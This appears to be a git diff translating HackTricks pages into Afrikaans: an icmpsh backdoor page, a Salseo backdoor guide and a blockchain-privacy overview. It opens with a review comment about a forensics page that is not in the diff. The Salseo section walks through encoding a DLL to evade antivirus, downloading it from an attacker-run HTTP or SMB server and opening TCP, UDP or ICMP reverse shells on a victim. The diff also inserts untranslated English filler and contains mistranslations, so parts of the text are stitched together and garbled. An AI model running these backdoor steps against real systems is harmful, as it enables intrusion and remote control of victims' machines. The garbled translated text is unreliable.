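Review bot: In the `## Geslote Toestel` list the step `* Check if the device has debugging via USB activated.` is translated as `* Kyk of die toestel USB-afdeling aktief het.`, and `afdeling` means department or section, so the first step of the locked-device procedure (check whether USB debugging, `USB-ontfouting`, is enabled) is lost for an Afrikaans reader. Likewise `### If root access or physical connection to JTAG interface` becomes `worteltoegang`, the literal root-vegetable reading; Afrikaans technical text keeps `root-toegang`, just as this page keeps `adb`, `JTAG` and `LiME` untranslated. `oopgemaak` (opened) for "unlocked" in the opening sentence is also ambiguous on a page that goes on to discuss physical JTAG access; `ontsluit` is the word for clearing a screen lock. Suggest adding these terms to the workflow glossary and having a reviewer check every translated imperative against the English, since a mistranslated step in an acquisition procedure is worse than an untranslated one. Finally, the `dd if=/dev/block/mmcblk0 ...` bullet is the only command on the page not wrapped in backticks on either side of the diff; that is pre-existing, but the line is being rewritten anyway, so fencing it here would be a cheap fix.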
diff --git a/backdoors/icmpsh.md b/backdoors/icmpsh.md index af92f95f5..ceb4dee7a 100644 --- a/backdoors/icmpsh.md +++ b/backdoors/icmpsh.md @@ -1,62 +1,50 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-Download the backdoor from: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) +Laai die agterdeur af vanaf: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) -# Client side +# Kliëntkant -Execute the script: **run.sh** - -**If you get some error, try to change the lines:** +Voer die skrip uit: **run.sh** +**As jy 'n fout kry, probeer om die lyne te verander:** ```bash IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1) IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }') ``` - -**For:** - +**Vir:** ```bash echo Please insert the IP where you want to listen read IP ``` +# **Slagofferkant** -# **Victim Side** - -Upload **icmpsh.exe** to the victim and execute: - +Laai **icmpsh.exe** op na die slagoffer se rekenaar en voer dit uit: ```bash icmpsh.exe -t -d 500 -b 30 -s 128 ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/backdoors/salseo.md b/backdoors/salseo.md index b50c8851b..13fb06d40 100644 --- a/backdoors/salseo.md +++ b/backdoors/salseo.md @@ -2,171 +2,182 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Compiling the binaries +## Kompilering van die binnerwerke -Download the source code from the github and compile **EvilSalsa** and **SalseoLoader**. You will need **Visual Studio** installed to compile the code. +Laai die bronkode van die github af en kompileer **EvilSalsa** en **SalseoLoader**. Jy sal **Visual Studio** geïnstalleer moet hê om die kode te kompileer. -Compile those projects for the architecture of the windows box where your are going to use them(If the Windows supports x64 compile them for that architectures). +Kompileer hierdie projekte vir die argitektuur van die Windows-boks waar jy dit gaan gebruik (As die Windows x64 ondersteun, kompileer dit vir daardie argitekture). -You can **select the architecture** inside Visual Studio in the **left "Build" Tab** in **"Platform Target".** +Jy kan die argitektuur **kies** binne Visual Studio in die **linker "Build" Tab** in **"Platform Target".** -(\*\*If you can't find this options press in **"Project Tab"** and then in **"\ Properties"**) +(\*\*As jy hierdie opsies nie kan vind nie, druk op **"Project Tab"** en dan op **"\ Properties"**) ![](<../.gitbook/assets/image (132).png>) -Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable): +Bou dan beide projekte (Build -> Build Solution) (Binne die logs sal die pad van die uitvoerbare lêer verskyn): ![](<../.gitbook/assets/image (1) (2) (1) (1) (1).png>) -## Prepare the Backdoor +## Berei die agterdeur voor -First of all, you will need to encode the **EvilSalsa.dll.** To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly**: +Eerstens sal jy die **EvilSalsa.dll** moet enkodeer. 
Jy kan die Python-skripsie **encrypterassembly.py** gebruik of jy kan die projek **EncrypterAssembly** kompileer: ### **Python** - ``` python EncrypterAssembly/encrypterassembly.py python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt ``` - ### Windows +#### Salseo + +Salseo is a backdoor that allows remote access to a compromised Windows system. It is commonly used by attackers to maintain persistence and control over the compromised system. + +##### Features + +- **Remote Access**: Salseo provides remote access to the compromised system, allowing the attacker to execute commands and interact with the system. +- **Persistence**: Salseo is designed to maintain persistence on the compromised system, ensuring that the attacker can regain access even after system reboots. +- **Stealth**: Salseo is designed to operate stealthily, avoiding detection by antivirus software and other security measures. +- **Command Execution**: Salseo allows the attacker to execute arbitrary commands on the compromised system, giving them full control over the system. +- **File Transfer**: Salseo supports file transfer between the attacker's system and the compromised system, allowing the attacker to exfiltrate data or upload additional tools. +- **Keylogging**: Salseo can be configured to log keystrokes on the compromised system, allowing the attacker to capture sensitive information such as passwords. +- **Screenshot Capture**: Salseo can capture screenshots of the compromised system, providing the attacker with visual information about the system's activities. +- **Network Communication**: Salseo communicates with the attacker's system over the network, enabling remote control and data exfiltration. + +##### Detection and Mitigation + +- **Antivirus Software**: Keep your antivirus software up to date to detect and remove known instances of Salseo. 
+- **Network Monitoring**: Monitor network traffic for suspicious activity, such as connections to known malicious IP addresses or unusual data transfers. +- **System Hardening**: Implement security best practices, such as disabling unnecessary services, applying patches and updates, and using strong passwords. +- **Behavioral Analysis**: Use behavioral analysis tools to detect abnormal system behavior that may indicate the presence of Salseo. +- **Firewall**: Configure a firewall to block incoming and outgoing connections to known malicious IP addresses or suspicious domains. +- **User Education**: Educate users about the risks of opening suspicious email attachments or clicking on malicious links, as these are common infection vectors for Salseo. + +##### Conclusion + +Salseo is a powerful backdoor that provides attackers with remote access and control over compromised Windows systems. Detecting and mitigating Salseo requires a combination of proactive security measures, such as antivirus software, network monitoring, system hardening, behavioral analysis, firewall configuration, and user education. By implementing these measures, you can significantly reduce the risk of Salseo infection and protect your systems from unauthorized access. ``` EncrypterAssembly.exe EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt ``` +Ok, nou het jy alles wat jy nodig het om die hele Salseo ding uit te voer: die **gekodeerde EvilDalsa.dll** en die **binêre van SalseoLoader.** -Ok, now you have everything you need to execute all the Salseo thing: the **encoded EvilDalsa.dll** and the **binary of SalseoLoader.** +**Laai die SalseoLoader.exe binêre na die masjien op. Dit behoort nie deur enige AV opgespoor te word nie...** -**Upload the SalseoLoader.exe binary to the machine. 
They shouldn't be detected by any AV...** +## **Voer die agterdeur uit** -## **Execute the backdoor** - -### **Getting a TCP reverse shell (downloading encoded dll through HTTP)** - -Remember to start a nc as the reverse shell listener and a HTTP server to serve the encoded evilsalsa. +### **Kry 'n TCP-omgekeerde skulp (deur die gekodeerde dll af te laai deur HTTP)** +Onthou om 'n nc as die omgekeerde skulp luisteraar te begin en 'n HTTP-bediener om die gekodeerde evilsalsa te bedien. ``` SalseoLoader.exe password http:///evilsalsa.dll.txt reversetcp ``` +### **Kry 'n UDP omgekeerde dop (laai gekodeerde dll af deur SMB)** -### **Getting a UDP reverse shell (downloading encoded dll through SMB)** - -Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver). - +Onthou om 'n nc as die omgekeerde dop luisteraar te begin, en 'n SMB-bediener om die gekodeerde evilsalsa te dien (impacket-smbserver). ``` SalseoLoader.exe password \\/folder/evilsalsa.dll.txt reverseudp ``` +### **Kry 'n ICMP omgekeerde dop (geënkripteerde dll reeds binne die slagoffer)** -### **Getting a ICMP reverse shell (encoded dll already inside the victim)** - -**This time you need a special tool in the client to receive the reverse shell. Download:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh) - -#### **Disable ICMP Replies:** +**Hierdie keer het jy 'n spesiale instrument in die kliënt nodig om die omgekeerde dop te ontvang. 
Laai af:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh) +#### **Deaktiveer ICMP Antwoorde:** ``` sysctl -w net.ipv4.icmp_echo_ignore_all=1 #You finish, you can enable it again running: sysctl -w net.ipv4.icmp_echo_ignore_all=0 ``` - -#### Execute the client: - +#### Voer die kliënt uit: ``` python icmpsh_m.py "" "" ``` - -#### Inside the victim, lets execute the salseo thing: - +#### Binne die slagoffer, laat ons die salseo ding uitvoer: ``` SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp ``` +## Kompilering van SalseoLoader as DLL wat die hooffunksie uitvoer -## Compiling SalseoLoader as DLL exporting main function +Maak die SalseoLoader-projek oop met behulp van Visual Studio. -Open the SalseoLoader project using Visual Studio. - -### Add before the main function: \[DllExport] +### Voeg voor die hooffunksie by: \[DllExport] ![](<../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) -### Install DllExport for this project +### Installeer DllExport vir hierdie projek #### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...** ![](<../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) -#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)** +#### **Soek na die DllExport-pakket (deur die Browse-tabblad te gebruik) en druk op Installeer (en aanvaar die popup)** ![](<../.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1) (1) (1).png>) -In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat** +In jou projeklêer het die lêers verskyn: **DllExport.bat** en **DllExport\_Configure.bat** -### **U**ninstall DllExport +### **D**eïnstalleer DllExport -Press **Uninstall** (yeah, its weird but trust me, it is necessary) +Druk **Deïnstalleer** (ja, dit is vreemd, maar glo my, dit is nodig) ![](<../.gitbook/assets/image (5) (1) (1) (2) (1).png>) -### **Exit 
Visual Studio and execute DllExport\_configure** +### **Sluit Visual Studio af en voer DllExport\_configure uit** -Just **exit** Visual Studio +Sluit eenvoudig Visual Studio af -Then, go to your **SalseoLoader folder** and **execute DllExport\_Configure.bat** +Gaan dan na jou **SalseoLoader-lêer** en **voer DllExport\_Configure.bat uit** -Select **x64** (if you are going to use it inside a x64 box, that was my case), select **System.Runtime.InteropServices** (inside **Namespace for DllExport**) and press **Apply** +Kies **x64** (as jy dit binne 'n x64-boks gaan gebruik, dit was my geval), kies **System.Runtime.InteropServices** (binne **Namespace for DllExport**) en druk op **Apply** ![](<../.gitbook/assets/image (7) (1) (1) (1) (1).png>) -### **Open the project again with visual Studio** +### **Maak die projek weer oop met Visual Studio** -**\[DllExport]** should not be longer marked as error +**\[DllExport]** behoort nie meer as 'n fout gemerk te wees nie ![](<../.gitbook/assets/image (8) (1).png>) -### Build the solution +### Bou die oplossing -Select **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library) +Kies **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library) ![](<../.gitbook/assets/image (10) (1).png>) -Select **x64** **platform** (Project --> SalseoLoader Properties --> Build --> Platform target = x64) +Kies **x64-platform** (Project --> SalseoLoader Properties --> Build --> Platform target = x64) ![](<../.gitbook/assets/image (9) (1) (1).png>) -To **build** the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear) +Om die oplossing te **bou**: Build --> Build Solution (Die pad van die nuwe DLL sal in die Uitvoerkonsole verskyn) -### Test the generated Dll +### Toets die gegenereerde Dll -Copy and paste the Dll where you want to test it. 
- -Execute: +Kopieer en plak die Dll waar jy dit wil toets. +Voer uit: ``` rundll32.exe SalseoLoader.dll,main ``` +As geen fout verskyn nie, het jy waarskynlik 'n funksionele DLL!! -If no error appears, probably you have a functional DLL!! +## Kry 'n skul gebruik die DLL -## Get a shell using the DLL - -Don't forget to use a **HTTP** **server** and set a **nc** **listener** +Moenie vergeet om 'n **HTTP** **bediener** te gebruik en 'n **nc** **luisteraar** in te stel ### Powershell - ``` $env:pass="password" $env:payload="http://10.2.0.5/evilsalsax64.dll.txt" @@ -175,9 +186,9 @@ $env:lport="1337" $env:shell="reversetcp" rundll32.exe SalseoLoader.dll,main ``` - ### CMD +CMD (Command Prompt) is 'n opdraggewer wat beskikbaar is op Windows-bedryfstelsels. Dit bied 'n gebruikersvriendelike omgewing waarin gebruikers opdragte kan uitvoer om verskeie take uit te voer. Hierdie opdragte kan gebruik word om sagteware te installeer, lêers te skep en te wysig, netwerkverbindings te bestuur en vele ander funksies uit te voer. CMD is 'n kragtige hulpmiddel wat deur hackers gebruik kan word om toegang tot 'n stelsel te verkry en verskeie aanvalle uit te voer. ``` set pass=password set payload=http://10.2.0.5/evilsalsax64.dll.txt @@ -186,17 +197,16 @@ set lport=1337 set shell=reversetcp rundll32.exe SalseoLoader.dll,main ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/blockchain/blockchain-and-crypto-currencies/README.md b/blockchain/blockchain-and-crypto-currencies/README.md index 988b051e5..a55e7badd 100644 --- a/blockchain/blockchain-and-crypto-currencies/README.md +++ b/blockchain/blockchain-and-crypto-currencies/README.md @@ -1,195 +1,189 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Concepts +## Basiese Konsepte -- **Smart Contracts** are defined as programs that execute on a blockchain when certain conditions are met, automating agreement executions without intermediaries. -- **Decentralized Applications (dApps)** build upon smart contracts, featuring a user-friendly front-end and a transparent, auditable back-end. -- **Tokens & Coins** differentiate where coins serve as digital money, while tokens represent value or ownership in specific contexts. - - **Utility Tokens** grant access to services, and **Security Tokens** signify asset ownership. -- **DeFi** stands for Decentralized Finance, offering financial services without central authorities. -- **DEX** and **DAOs** refer to Decentralized Exchange Platforms and Decentralized Autonomous Organizations, respectively. +- **Slim Kontrakte** word gedefinieer as programme wat op 'n blokketting uitgevoer word wanneer sekere voorwaardes voldoen word, wat ooreenkomste outomaties sonder tussenpersone uitvoer. +- **Gedentraliseerde Toepassings (dApps)** bou op slim kontrakte, met 'n gebruikersvriendelike voorkant en 'n deursigtige, auditeerbare agterkant. +- **Tokens & Munte** onderskei waar munte as digitale geld dien, terwyl tokens waarde of eienaarskap in spesifieke kontekste verteenwoordig. +- **Hulpmiddel-Tokens** gee toegang tot dienste, en **Sekuriteits-Tokens** dui bateseienaarskap aan. +- **DeFi** staan vir Gedentraliseerde Finansies en bied finansiële dienste sonder sentrale owerhede. +- **DEX** en **DAO's** verwys onderskeidelik na Gedentraliseerde Ruilplatforms en Gedentraliseerde Outonome Organisasies. -## Consensus Mechanisms +## Konsensusmeganismes -Consensus mechanisms ensure secure and agreed transaction validations on the blockchain: -- **Proof of Work (PoW)** relies on computational power for transaction verification. -- **Proof of Stake (PoS)** demands validators to hold a certain amount of tokens, reducing energy consumption compared to PoW. 
+Konsensusmeganismes verseker veilige en ooreengekome transaksievalidasies op die blokketting: +- **Bewys van Werk (PoW)** steun op rekenaarvermoë vir transaksieverifikasie. +- **Bewys van Aandeel (PoS)** vereis dat valideerders 'n sekere hoeveelheid tokens besit, wat energieverbruik verminder in vergelyking met PoW. -## Bitcoin Essentials +## Bitcoin Essensies -### Transactions +### Transaksies -Bitcoin transactions involve transferring funds between addresses. Transactions are validated through digital signatures, ensuring only the owner of the private key can initiate transfers. +Bitcoin-transaksies behels die oordra van fondse tussen adresse. Transaksies word deur digitale handtekeninge gevalideer, wat verseker dat slegs die eienaar van die privaat sleutel oordragte kan inisieer. -#### Key Components: +#### Sleutelkomponente: -- **Multisignature Transactions** require multiple signatures to authorize a transaction. -- Transactions consist of **inputs** (source of funds), **outputs** (destination), **fees** (paid to miners), and **scripts** (transaction rules). +- **Multisignature-transaksies** vereis meervoudige handtekeninge om 'n transaksie te magtig. +- Transaksies bestaan uit **inskrywings** (bron van fondse), **uitsette** (bestemming), **fooie** (betaal aan myners) en **skripsies** (transaksiereëls). -### Lightning Network +### Lightning-netwerk -Aims to enhance Bitcoin's scalability by allowing multiple transactions within a channel, only broadcasting the final state to the blockchain. +Beoog om die skaalbaarheid van Bitcoin te verbeter deur meervoudige transaksies binne 'n kanaal toe te laat, en slegs die finale toestand na die blokketting uit te saai. -## Bitcoin Privacy Concerns +## Bitcoin-privasiemetodes -Privacy attacks, such as **Common Input Ownership** and **UTXO Change Address Detection**, exploit transaction patterns. Strategies like **Mixers** and **CoinJoin** improve anonymity by obscuring transaction links between users. 
+Privasiemetodes, soos **Gemeenskaplike Invoereienaarskap** en **UTXO-veranderingsadresopsporing**, maak gebruik van transaksiepatrone. Strategieë soos **Mengers** en **CoinJoin** verbeter anonimiteit deur transaksieskakels tussen gebruikers te verdoesel. -## Acquiring Bitcoins Anonymously +## Anonieme verkryging van Bitcoins -Methods include cash trades, mining, and using mixers. **CoinJoin** mixes multiple transactions to complicate traceability, while **PayJoin** disguises CoinJoins as regular transactions for heightened privacy. +Metodes sluit kontanttransaksies, mynbou en die gebruik van mengers in. **CoinJoin** meng verskeie transaksies om spoorbaarheid te bemoeilik, terwyl **PayJoin** CoinJoins as gewone transaksies vermom vir verhoogde privaatheid. -# Bitcoin Privacy Atacks +# Bitcoin-privasiemetodes -# Summary of Bitcoin Privacy Attacks +# Opsomming van Bitcoin-privasiemetodes -In the world of Bitcoin, the privacy of transactions and the anonymity of users are often subjects of concern. Here's a simplified overview of several common methods through which attackers can compromise Bitcoin privacy. +In die wêreld van Bitcoin is die privaatheid van transaksies en die anonimiteit van gebruikers dikwels onderwerp van kommer. Hier is 'n vereenvoudigde oorsig van verskeie algemene metodes waarmee aanvallers Bitcoin-privasie kan benadeel. -## **Common Input Ownership Assumption** +## **Gemeenskaplike Invoereienaarskap-aanname** -It is generally rare for inputs from different users to be combined in a single transaction due to the complexity involved. Thus, **two input addresses in the same transaction are often assumed to belong to the same owner**. +Dit is oor die algemeen selde dat invoere van verskillende gebruikers in 'n enkele transaksie gekombineer word as gevolg van die betrokkenheid van kompleksiteit. Dus word **twee invoeradresse in dieselfde transaksie dikwels aan dieselfde eienaar toegeskryf**. 
-## **UTXO Change Address Detection** +## **UTXO-veranderingsadresopsporing** -A UTXO, or **Unspent Transaction Output**, must be entirely spent in a transaction. If only a part of it is sent to another address, the remainder goes to a new change address. Observers can assume this new address belongs to the sender, compromising privacy. +'n UTXO, of **Ongebruikte Transaksie-uitset**, moet heeltemal in 'n transaksie spandeer word. As slegs 'n deel daarvan na 'n ander adres gestuur word, gaan die res na 'n nuwe veranderingsadres. Waarnemers kan aanneem dat hierdie nuwe adres aan die sender behoort, wat privaatheid benadeel. -### Example -To mitigate this, mixing services or using multiple addresses can help obscure ownership. +### Voorbeeld +Om dit te verminder, kan mengdienste of die gebruik van verskeie adresse help om eienaarskap te verdoesel. -## **Social Networks & Forums Exposure** +## **Sosiale Netwerke & Forum Blootstelling** -Users sometimes share their Bitcoin addresses online, making it **easy to link the address to its owner**. +Gebruikers deel soms hul Bitcoin-adresse aanlyn, wat dit **maklik maak om die adres aan sy eienaar te koppel**. -## **Transaction Graph Analysis** +## **Transaksiegrafiekontleding** -Transactions can be visualized as graphs, revealing potential connections between users based on the flow of funds. +Transaksies kan as grafieke voorgestel word, wat potensiële verbindings tussen gebruikers onthul op grond van die vloei van fondse. -## **Unnecessary Input Heuristic (Optimal Change Heuristic)** +## **Onnodige Invoerheuristiek (Optimale Veranderingsheuristiek)** -This heuristic is based on analyzing transactions with multiple inputs and outputs to guess which output is the change returning to the sender. - -### Example +Hierdie heuristiek is gebaseer op die analise van transaksies met meervoudige invoere en uitsette om te raai watter uitset die verandering is wat na die sender terugkeer. 
+### Voorbeeld ```bash 2 btc --> 4 btc 3 btc 1 btc ``` +Indien die toevoeging van meer insette die uitset groter maak as enige enkele inset, kan dit die heuristiek in die war bring. -If adding more inputs makes the change output larger than any single input, it can confuse the heuristic. +## **Gedwonge Adres Hergebruik** -## **Forced Address Reuse** +Aanvallers kan klein bedrae na voorheen gebruikte adresse stuur, in die hoop dat die ontvanger dit saam met ander insette in toekomstige transaksies gebruik, en sodoende adresse aan mekaar koppel. -Attackers may send small amounts to previously used addresses, hoping the recipient combines these with other inputs in future transactions, thereby linking addresses together. +### Korrekte Beursiegedrag +Beursies moet voorkom dat munte ontvang op reeds gebruikte, leë adresse om hierdie privaatheidslek te voorkom. -### Correct Wallet Behavior -Wallets should avoid using coins received on already used, empty addresses to prevent this privacy leak. +## **Ander Blockchain Analise Tegnieke** -## **Other Blockchain Analysis Techniques** +- **Presiese Betalingsbedrae:** Transaksies sonder wisselgeld is waarskynlik tussen twee adresse wat deur dieselfde gebruiker besit word. +- **Ronde Getalle:** 'n Ronde getal in 'n transaksie dui daarop dat dit 'n betaling is, met die nie-ronde uitset wat waarskynlik die wisselgeld is. +- **Beursie Vingerafdrukke:** Verskillende beursies het unieke transaksie-skeppingspatrone, wat analiste in staat stel om die gebruikte sagteware en moontlik die wisselgeldadres te identifiseer. +- **Bedrag & Tydsverbande:** Die bekendmaking van transaksie-tye of -bedrae kan transaksies naspeurbaar maak. -- **Exact Payment Amounts:** Transactions without change are likely between two addresses owned by the same user. -- **Round Numbers:** A round number in a transaction suggests it's a payment, with the non-round output likely being the change. 
